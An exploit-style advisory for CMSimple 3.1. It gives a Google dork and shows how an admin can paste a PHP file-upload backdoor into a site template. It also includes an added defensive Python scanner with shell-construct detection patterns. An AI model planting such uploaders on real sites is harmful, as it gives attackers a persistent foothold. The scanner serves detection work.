CMSimple version 3.1 PHP Code disclosure

2012-09-17 21:45:53
Posted by: dementor

#############################################################
# Exploit Title: CMSimple version 3.1 PHP Code disclosure
# Google Dork: Powered By CMSimple.dk
# Date: 18/09/2012
# Exploit Author: Mr.Dementor
# Homepage : http://www.magetan-it.org/
# Contact : [email protected]
# Vendor Homepage: http://www.cmsimple.dk/, http://www.dotcomwebdesign.com/
# Version: 3.1
# Tested on: Win7
##############################################################

#SOFTWARE DESCRIPTION :
-----------------------
CMSimple version 3.1 - Jun 2008
Small - simple - smart
- IMPORTANT NOTICE: As covered by the AGPL Section 2(d), the "Powered by CMSimple"-link to cmsimple.dk must under no circumstances be removed from pages generated by this program (except in print facility). If you want to remove or hide this link from your pages, you must purchase CMSimple under a commercial license. This also applies to testing purposes and setup on an intranet or internal network.
- Please be aware that the AGPL in Section 2(d) requires that any modified version of the program run publicly (i.e. on the Internet) must have an additional download facility for the modified version. This also applies to any modification of the template. Therefore you should purchase a commercial license if you do not want the design of your internet site to fall under the AGPL license.
- For further information about this license and how to purchase a commercial license, please see http://www.cmsimple.dk/?License
- For downloads and information about installation, please see http://www.cmsimple.dk

#PROOF OF CONCEPT :
-------------------
1. Log in to the admin panel.
Important: the password is not stored in a database. It is written in plaintext in config.php, as this excerpt of the file shows:

#############################################
<?php
$cf['security']['password']="somepassword";
$cf['security']['type']="page";
$cf['site']['title']="some tittle";
$cf['site']['template']="template_name";
$cf['language']['default']="en";
#############################################

So an attacker who is not the administrator cannot learn the password from the application itself; they can only obtain it by reading config.php through some other route (for example a symlink attack on a shared host, or pivoting from another compromised server).

2. Open the template editor at http://some.target/?file=template&action=edit
The screenshots linked below show the template (*.php) contents being read in the editor and the uploader form being pasted into the script.

simple uploader script :
#########################################
<?php
// Minimal upload form. Once pasted into the template it is rendered on every page the site serves.
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
// On submit, copy the uploaded temp file into the current directory under its original client-supplied name.
if (isset($_POST['_upl']) && $_POST['_upl'] == "Upload") {
    if (@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo 'upload success'; } else { echo 'upload failed'; }
}
?>
#########################################

Step 1 (screenshot): http://2.bp.blogspot.com/-swfpoRh2XCg/UFd6Td8rb6I/AAAAAAAAAqc/Vjdcll9KZHo/s1600/edit.png
Step 2 (screenshot): http://4.bp.blogspot.com/-ft6YlZWYz8M/UFd7Tg8kC6I/AAAAAAAAAqo/t4B9mrvElKY/s1600/uploadform.png

3. Save your changes. The uploader is now served from the template and works as shown :)
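Two things in the procedure above are worth checking on a real install: whether config.php still carries the admin password in the clear (step 1), and whether a template already contains an upload or eval backdoor like the one pasted in step 2. The scanner below is an added example, not code from the advisory or from CMSimple; it builds a small throwaway install with constructed files (a clean template, a backdoored template and a config.php in the advisory's format) and audits it. The list of suspicious constructs, the directory layout and the assumption that a hash would appear as a hex string or a `$`-prefixed value are illustrative choices of this example, not facts about CMSimple.

```python
"""Audit a CMSimple 3.x-style tree for a plaintext admin password in
config.php and for web-shell constructs planted inside template PHP blocks.
Added example; all file contents and paths below are constructed for the demo."""
import os
import re
import tempfile
from typing import Dict, List, Optional

# Constructs typical of template-embedded web shells (assumption: illustrative, not exhaustive).
SUSPICIOUS = [
    r"\bcopy\s*\(\s*\$_FILES",
    r"\bmove_uploaded_file\s*\(",
    r"\$_FILES\b",
    r"\beval\s*\(",
    r"\b(?:system|shell_exec|passthru|exec)\s*\(",
    r"\bbase64_decode\s*\(",
]
SUSPICIOUS_RE = re.compile("|".join(SUSPICIOUS))

# Matches the config line shown in the advisory: $cf['security']['password']="...";
PASSWORD_RE = re.compile(r"""\$cf\['security'\]\['password'\]\s*=\s*(['"])(.*?)\1\s*;""")


def plaintext_password(config_text: str) -> Optional[str]:
    """Return the admin password when config.php stores it in clear, else None.
    Assumption for this demo: a hashed value is a long hex string or starts with '$'."""
    m = PASSWORD_RE.search(config_text)
    if not m:
        return None
    value = m.group(2)
    if re.fullmatch(r"[0-9a-fA-F]{32,}", value) or value.startswith("$"):
        return None
    return value


def scan_template(php_text: str) -> List[str]:
    """Return every suspicious construct found inside <?php ... ?> blocks."""
    hits: List[str] = []
    for block in re.findall(r"<\?(?:php)?(.*?)(?:\?>|$)", php_text, re.S):
        hits.extend(m.group(0) for m in SUSPICIOUS_RE.finditer(block))
    return hits


def audit(root: str) -> Dict[str, object]:
    """Walk an install: check config.php for a clear password and every
    other file for shell constructs (templates are scanned whatever their extension)."""
    findings: Dict[str, object] = {"plaintext_password": None, "templates": {}}
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                text = fh.read()
            if name == "config.php":
                findings["plaintext_password"] = plaintext_password(text)
            else:
                hits = scan_template(text)
                if hits:
                    findings["templates"][os.path.relpath(path, root)] = hits  # type: ignore[index]
    return findings


# Constructed sample files for the demo (not real CMSimple files).
CLEAN_TEMPLATE = "<html><body><?php echo content(); ?></body></html>\n"
BACKDOORED_TEMPLATE = CLEAN_TEMPLATE + (
    "<?php if(isset($_POST['_upl']) && $_POST['_upl']=='Upload'){"
    "@copy($_FILES['file']['tmp_name'],$_FILES['file']['name']);} ?>\n")
CONFIG = "<?php\n$cf['security']['password']=\"somepassword\";\n$cf['security']['type']=\"page\";\n"


def build_demo_install() -> str:
    """Create a throwaway tree: config.php at the root, one clean and one backdoored template."""
    root = tempfile.mkdtemp(prefix="cmsimple_demo_")
    for rel, text in [
        ("config.php", CONFIG),
        (os.path.join("templates", "default", "template.php"), CLEAN_TEMPLATE),
        (os.path.join("templates", "evil", "template.php"), BACKDOORED_TEMPLATE),
    ]:
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(text)
    return root


if __name__ == "__main__":
    demo_root = build_demo_install()
    for key, value in audit(demo_root).items():
        print(f"{key}: {value}")
```

Run it against a real document root instead of the demo tree by calling `audit("/path/to/cmsimple")`; any template listed under `templates` deserves a manual look, and a non-empty `plaintext_password` means the config file must be kept unreadable to every other tenant of the host.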

#WHAT IS THE RISK ?
-------------------
The template editor lets anyone holding the admin password edit PHP source and plant a backdoor (such as the uploader above) directly through the web application, with no man-in-the-middle position and no access to the hosting control panel or FTP required.

#############################
# Special thanks to : BL4cKc0d1n6
# Best Greets : Handi Eko Saputro
# Greets : tiaNG_jaWI , aSU_aBANG, Cybertaziex, Detol SevenCrew, De Vinclous, Dany Artha, BL4cKc0d1n6, Shadow Banditz.
#############################

Fixes

No fixes
